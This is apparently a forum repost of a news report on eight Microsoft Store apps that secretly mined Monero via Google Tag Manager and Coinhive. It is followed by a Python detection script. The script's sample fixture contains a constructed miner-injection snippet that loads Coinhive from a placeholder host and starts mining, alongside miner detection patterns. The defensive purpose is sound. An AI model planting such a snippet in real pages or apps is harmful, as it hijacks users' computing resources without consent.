silversurfer
Microsoft has removed from the official Microsoft Store eight Windows 10 apps that had been caught mining the Monero cryptocurrency behind users' backs for the benefit of the apps' developers.

The names of the eight apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.

The apps were developed by three developers, namely DigiDream, 1clean, and Findoo. US cyber-security firm Symantec, which discovered the malicious apps last month, says evidence they uncovered in the applications' source code and adjacent domains led them to believe all eight had been developed by the same person or group, despite the different names.

According to a Symantec technical report shared with ZDNet, all apps worked in a similar fashion. All loaded the Google Tag Manager (GTM) library within their source code, through which they later downloaded and executed the actual malicious payload.

This last-stage piece of code was a pirated version of the infamous Coinhive, a JavaScript library that many hackers have secretly added on hacked sites to mine Monero using visitors' browsers.

Besides hacked sites, the library has also been used in any apps that can execute JavaScript code, such as game mods, Android and iOS apps, and, now, Windows 10 apps. This marks the first time such apps have been found on the Microsoft Store, Symantec has told ZDNet.

"These apps fall under the category of Progressive Web Applications, which are installed as a Windows 10 app running independently from the browser, in a standalone (WWAHost.exe process) window," Symantec experts said in their report, explaining how these apps were able to run the Coinhive JavaScript code to begin with.

"A malicious URL with mining script was detected, and we backtracked to find these applications," Tommy Dong, Senior Principal Software Engineer at Symantec, told ZDNet. "Symantec AV can convict generic JS-based cryptocurrency mining disregarding any domain."

Users who installed these apps over the past few months would have seen their CPU usage go through the roof, as the Coinhive miner would consume all available resources to mine Monero for the app devs.
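Added example, not code from the post or from Symantec's report: a small static triage script that checks for the two-stage chain described above, a Google Tag Manager loader in the app's shell HTML followed by a fetched tag body that calls Coinhive's public JavaScript API. The GTM container id, sitekey and script host in the samples are constructed placeholders, and the tag bodies are assumed to have been captured from a proxy log.

```python
"""Static triage for the indicator chain in the post: a PWA's shell HTML loads
Google Tag Manager, and the fetched tag drops a Coinhive-style JS miner.
All sample inputs below are constructed, not taken from real apps."""
import re

# Public Coinhive JavaScript API names: script file, miner constructors, and
# the tab-policy constants passed to start().
MINER_PATTERNS = {
    "coinhive_script": r"coinhive\.min\.js",
    "coinhive_ctor": r"CoinHive\.(Anonymous|User)\s*\(",
    "coinhive_start": r"\.start\s*\(\s*CoinHive\.(IF_EXCLUSIVE_TAB|FORCE_EXCLUSIVE_TAB|FORCE_MULTI_TAB)",
}
# Literal GTM loader URL; loaders that build the id at runtime need dynamic capture.
GTM_LOADER = r"googletagmanager\.com/gtm\.js\?id=(GTM-[A-Z0-9]+)"

def find_gtm_ids(source):
    """GTM container ids referenced literally in a page or script."""
    return re.findall(GTM_LOADER, source)

def find_miner_indicators(source):
    """Names of the miner patterns that match anywhere in the given text."""
    return sorted(n for n, p in MINER_PATTERNS.items() if re.search(p, source))

def assess(shell_html, fetched_tags):
    """Classify an app from its shell HTML plus the tag bodies it fetched;
    fetched_tags maps GTM id -> JS text (assumed captured via a proxy log)."""
    gtm_ids = find_gtm_ids(shell_html)
    miner_via_gtm = {}
    for gid in gtm_ids:
        hits = find_miner_indicators(fetched_tags.get(gid, ""))
        if hits:  # miner arrives only through the second-stage tag
            miner_via_gtm[gid] = hits
    in_shell = find_miner_indicators(shell_html)
    return {"gtm_ids": gtm_ids, "miner_in_shell": in_shell,
            "miner_via_gtm": miner_via_gtm,
            "suspicious": bool(in_shell or miner_via_gtm)}

# Constructed sample: the shell looks clean apart from a GTM loader ...
SAMPLE_HTML = """<html><head>
<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX"></script>
</head><body><h1>Fast search</h1></body></html>"""
# ... and the container it fetches injects the miner (constructed tag body).
SAMPLE_TAGS = {"GTM-XXXXXXX": (
    "var s=document.createElement('script');"
    "s.src='https://example.invalid/lib/coinhive.min.js';document.head.appendChild(s);"
    "var m=new CoinHive.Anonymous('SITEKEY_PLACEHOLDER');m.start(CoinHive.FORCE_MULTI_TAB);"
)}
```

Because the shell HTML itself contains nothing but the loader, scanning the package alone reports no miner; the verdict only flips once the fetched tag bodies are included, which is why the script takes both inputs.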